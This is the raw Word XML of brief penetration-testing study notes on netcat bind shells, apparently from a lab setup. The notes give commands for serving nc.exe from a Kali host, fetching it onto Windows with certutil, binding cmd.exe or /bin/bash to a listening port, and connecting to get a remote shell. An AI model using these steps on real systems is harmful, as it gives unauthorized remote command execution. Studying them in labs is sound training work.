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38FD" w14:textId="4F6BA088" w:rsidR="00853ABF" w:rsidRPr="006F05CA" w:rsidRDefault="006F05CA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F05CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bind Shells</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (remote shell)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F05CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50502D0D" w14:textId="79C58F81" w:rsidR="006F05CA" w:rsidRDefault="006F05CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B1F48D1" wp14:editId="3C9C7F87">
            <wp:extent cx="4375523" cy="1209822"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="15724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8290" name="Picture 1572468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04" cy="121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039A" w14:textId="77777777" w:rsidR="006F05CA" w:rsidRDefault="006F05CA"/>
    <w:p w14:paraId="76866501" w14:textId="05F5933D" w:rsidR="006F05CA" w:rsidRDefault="006F05CA">
      <w:r>
        <w:t xml:space="preserve">Execute command </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E5E387" w14:textId="77777777" w:rsidR="006F05CA" w:rsidRDefault="006F05CA"/>
    <w:p w14:paraId="17C7F35F" w14:textId="77777777" w:rsidR="00CE1D54" w:rsidRDefault="006F05CA">
      <w:r>
        <w:t>Nc must config to execute the shell like cmd.exe</w:t>
      </w:r>
      <w:r w:rsidR="00CE1D54">
        <w:t xml:space="preserve"> or /bin/bash when a client connects to the listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB5B268" w14:textId="4B18F6FC" w:rsidR="006F05CA" w:rsidRDefault="006F05CA">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190B192" w14:textId="684EA989" w:rsidR="00AC69E6" w:rsidRPr="00AC69E6" w:rsidRDefault="00AC69E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC69E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D860B72" w14:textId="6CDFA811" w:rsidR="00AC69E6" w:rsidRDefault="00AC69E6">
      <w:r>
        <w:t xml:space="preserve">Need to set up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener on target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD7652" w14:textId="77F4FCD1" w:rsidR="00AC69E6" w:rsidRDefault="00AC69E6">
      <w:r>
        <w:t xml:space="preserve">Mostly the inbound traffic </w:t>
      </w:r>
      <w:r w:rsidR="00791EA9">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mostly blocked by firewall/administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796907B2" w14:textId="77777777" w:rsidR="00AC69E6" w:rsidRDefault="00AC69E6"/>
    <w:p w14:paraId="6F48D96E" w14:textId="58EFB1AB" w:rsidR="00AC69E6" w:rsidRPr="00D05C95" w:rsidRDefault="00D05C95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EF5DD2" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="4E923D4F" w14:textId="373EB9F2" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t>HOW TO SETUP BIND SHELL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B6A3B7" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="7DBAB563" w14:textId="276F3D75" w:rsidR="00D05C95" w:rsidRPr="00D05C95" w:rsidRDefault="00D05C95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ON KALI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (attacker)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D21AF10" w14:textId="59612211" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t>Cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/windows-binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B469E30" w14:textId="180F7AC9" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t xml:space="preserve">Python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB94F4A" w14:textId="251FE641" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t>Ip a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D04DBD" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="498FF8E0" w14:textId="414CD8B1" w:rsidR="00D05C95" w:rsidRPr="00D05C95" w:rsidRDefault="00D05C95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ON WINDOW:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF3BEA" w14:textId="17F36C81" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t xml:space="preserve">Enter kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the browser and click on the file it downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA07C99" w14:textId="307F8072" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6F288E" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95" w:rsidP="00D05C95">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlcache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -f </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00B806C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://kali_ip/nc.exe nc.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C98BBF3" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="5EF84221" w14:textId="71956C65" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t>Cd Downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E1833" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="1A46700A" w14:textId="08765930" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t xml:space="preserve">Nc.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F028D47" w14:textId="105DB25B" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> help </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>manu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EAE0DBF" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="7988F64F" w14:textId="6E8FA2F6" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t>Nc.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173AF2B9" w14:textId="7E56DC66" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>when</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ever client </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>connect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it will get cmd session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B59932D" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="4D2F130F" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRPr="00D05C95" w:rsidRDefault="00D05C95" w:rsidP="00D05C95">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ON KALI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (attacker)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3632929B" w14:textId="6FB49DCB" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t>Nc 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</w:p>
    <w:p w14:paraId="18B18122" w14:textId="386DA76E" w:rsidR="00D05C95" w:rsidRDefault="00D05C95">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>receive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2978B9CB" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="1D637F12" w14:textId="0517DF3E" w:rsidR="00D05C95" w:rsidRDefault="002E0C98">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D78D969" w14:textId="391CCEEA" w:rsidR="002E0C98" w:rsidRDefault="002E0C98">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1AAB6C" w14:textId="77777777" w:rsidR="002E0C98" w:rsidRDefault="002E0C98"/>
    <w:p w14:paraId="0284244A" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="19CAE658" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="13146D31" w14:textId="77777777" w:rsidR="00D05C95" w:rsidRDefault="00D05C95"/>
    <w:p w14:paraId="1D44E8C9" w14:textId="0D1DABB5" w:rsidR="002F1C0E" w:rsidRDefault="002F1C0E" w:rsidP="002F1C0E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ON KALI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D941489" w14:textId="160E00F3" w:rsidR="002F1C0E" w:rsidRDefault="002F1C0E" w:rsidP="002F1C0E">
      <w:r>
        <w:t>Nc.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234 -</w:t>
      </w:r>
      <w:r>
        <w:t>c /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F10927A" w14:textId="5B872B1F" w:rsidR="002F1C0E" w:rsidRDefault="002F1C0E" w:rsidP="002F1C0E">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="008B7410">
        <w:t xml:space="preserve">c = </w:t>
      </w:r>
      <w:r>
        <w:t>execute the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F766063" w14:textId="77777777" w:rsidR="002F1C0E" w:rsidRDefault="002F1C0E" w:rsidP="002F1C0E"/>
    <w:p w14:paraId="2D9CCE40" w14:textId="77777777" w:rsidR="002F1C0E" w:rsidRPr="00D05C95" w:rsidRDefault="002F1C0E" w:rsidP="002F1C0E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DEBF9AF" w14:textId="77777777" w:rsidR="006F05CA" w:rsidRDefault="006F05CA"/>
    <w:p w14:paraId="2124E5D6" w14:textId="2EA6161D" w:rsidR="002F1C0E" w:rsidRPr="00D05C95" w:rsidRDefault="002F1C0E" w:rsidP="002F1C0E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ON WINDOW</w:t>
      </w:r>
      <w:r w:rsidR="00BF1D14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00683518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(attacker)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05C95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A4176D" w14:textId="55E10B5D" w:rsidR="008B7410" w:rsidRDefault="008B7410" w:rsidP="008B7410">
      <w:r>
        <w:t>Nc</w:t>
      </w:r>
      <w:r>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 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</w:p>
    <w:p w14:paraId="092E18DC" w14:textId="262A05A1" w:rsidR="00BF1D14" w:rsidRDefault="00BF1D14">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bash session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F8AA0" w14:textId="77777777" w:rsidR="00BF1D14" w:rsidRDefault="00BF1D14"/>
    <w:p w14:paraId="2D56FCAF" w14:textId="3924A281" w:rsidR="00BF1D14" w:rsidRDefault="00BF1D14">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7616B25D" w14:textId="0E9755CA" w:rsidR="00BF1D14" w:rsidRDefault="00BF1D14">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06548FFC" w14:textId="557DD937" w:rsidR="00BF1D14" w:rsidRDefault="00BF1D14">
      <w:r>
        <w:t>Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1452B140" w14:textId="77777777" w:rsidR="00BF1D14" w:rsidRDefault="00BF1D14"/>
    <w:sectPr w:rsidR="00BF1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D"/>
    <w:rsid w:val="002E0C98"/>
    <w:rsid w:val="002F1C0E"/>
    <w:rsid w:val="00310EBD"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00683518"/>
    <w:rsid w:val="006F05CA"/>
    <w:rsid w:val="00791EA9"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008B7410"/>
    <w:rsid w:val="00AC69E6"/>
    <w:rsid w:val="00BF1D14"/>
    <w:rsid w:val="00CB0487"/>
    <w:rsid w:val="00CD15D4"/>
    <w:rsid w:val="00CE1D54"/>
    <w:rsid w:val="00D0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6649"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9A917FCA-B8A8-492C-B36A-FE9A5B54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kali_ip/nc.exe%20nc.exe" TargetMode="Externa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150</Words>
  <Characters>825</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>275</Lines>
  <Paragraphs>81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26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-13T07:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-13T07:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>